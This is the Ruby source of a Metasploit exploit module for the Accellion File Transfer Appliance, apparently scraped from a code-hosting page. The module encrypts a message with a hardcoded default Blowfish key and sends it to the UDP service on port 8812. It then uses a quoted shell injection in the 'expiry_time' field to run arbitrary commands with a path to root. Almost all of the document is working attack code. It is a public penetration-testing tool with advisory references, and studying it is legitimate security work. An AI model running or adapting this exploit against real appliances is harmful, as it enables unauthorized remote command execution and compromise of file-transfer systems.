157 lines
4.6 KiB
Ruby
157 lines
4.6 KiB
Ruby
##
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# This module requires Metasploit: http://metasploit.com/download
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# Current source: https://github.com/rapid7/metasploit-framework
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##
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require 'msf/core'
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require 'openssl'
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require 'rexml/element'
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class MetasploitModule < Msf::Exploit::Remote
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Rank = ExcellentRanking
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include Msf::Exploit::Remote::Udp
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'Accellion FTA MPIPE2 Command Execution',
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'Description' => %q{
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This module exploits a chain of vulnerabilities in the Accellion
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File Transfer appliance. This appliance exposes a UDP service on
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port 8812 that acts as a gateway to the internal communication bus.
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This service uses Blowfish encryption for authentication, but the
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appliance ships with two easy to guess default authentication keys.
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This module abuses the known default encryption keys to inject a
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message into the communication bus. In order to execute arbitrary
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commands on the remote appliance, a message is injected into the bus
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destined for the 'matchrep' service. This service exposes a function
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named 'insert_plugin_meta_info' which is vulnerable to an input
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validation flaw in a call to system(). This provides access to the
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'soggycat' user account, which has sudo privileges to run the
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primary admin tool as root. These two flaws are fixed in update
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version FTA_8_0_562.
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},
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'Author' => [ 'hdm' ],
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'License' => MSF_LICENSE,
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'References' =>
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[
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['OSVDB', '71362'],
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['OSVDB', '71363'],
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['URL', 'http://www.rapid7.com/security-center/advisories/R7-0039.jsp'],
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],
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'Platform' => ['unix'],
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'Arch' => ARCH_CMD,
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'Privileged' => true,
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'Payload' =>
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{
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'Space' => 1024,
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'DisableNops' => true,
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'Compat' =>
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{
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'PayloadType' => 'cmd',
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'RequiredCmd' => 'generic perl ruby telnet',
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}
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},
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'Targets' =>
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[
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[ 'Automatic', { } ]
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],
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'DefaultTarget' => 0,
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'DisclosureDate' => 'Feb 7 2011'
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))
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register_options(
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[
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Opt::RPORT(8812),
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OptString.new('APPID', [true, 'The application ID (usually 1000)', '1000'])
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], self.class)
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end
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def exploit
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connect_udp
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appid = datastore['APPID']
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encoded_command = REXML::Text.new(payload.encoded).to_s
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wddx = %Q|
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<wddxPacket version='1.0'>
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<header/>
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<data>
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<struct>
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<var name='50001'><string>insert_plugin_meta_info</string></var>
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<var name='file_handle'><binary length='9'>MDAwMDAwMDAw</binary></var>
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<var name='aid'><string>#{appid}</string></var>
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<var name='client_ip'><string>127.0.0.1</string></var>
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<var name='package_id'><string>1</string></var>
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<var name='recipient_list'><array length='1'><string>#{Rex::Text.rand_text_alphanumeric(8)}</string></array></var>
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<var name='expiry_time'><string>'; #{encoded_command}; #'</string></var>
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</struct>
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</data>
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</wddxPacket>|
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packet = [
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rand(0xffffffff), # Source Location ID
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8888, # Destination Location ID
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rand(0xffff), # Source Application
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50001, # Destination Application (matchrep)
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Time.now.to_i
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].pack("NNnnN") + wddx
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header = [
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0, # Flags
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0, #
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1, # Sequence Number (must be the lowest seen from Source ID)
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33 # Execute (pass message to destination)
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].pack("CCNC") + packet
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data = [ simple_checksum(header) ].pack("n") + header
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enc = blowfish_encrypt("123456789ABCDEF0123456789ABCDEF0", data)
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udp_sock.put("\x01" + enc)
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handler
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disconnect_udp
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end
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def simple_checksum(data)
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sum = 0
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data.unpack("C*").map{ |c| sum = (sum + c) & 0xffff }
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sum
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end
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#
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# This implements blowfish-cbc with an MD5-expanded 448-bit key
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# using RandomIV for the initial value.
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#
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def blowfish_encrypt(pass, data)
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# Forces 8-bit encoding
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pass = pass.unpack("C*").pack("C*")
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data = data.unpack("C*").pack("C*")
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# Use 448-bit keys with 8-byte IV
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key_len = 56
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iv_len = 8
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# Expand the key with MD5 (key-generated-key mode)
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hash = OpenSSL::Digest::MD5.digest(pass)
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while (hash.length < key_len)
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hash << OpenSSL::Digest::MD5.digest(hash)
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end
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key = hash[0, key_len]
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iv = Rex::Text.rand_text(iv_len)
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c = OpenSSL::Cipher.new('bf-cbc')
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c.encrypt
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c.key_len = key_len
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c.key = key
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c.iv = iv
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"RandomIV" + iv + c.update(data) + c.final
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end
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end
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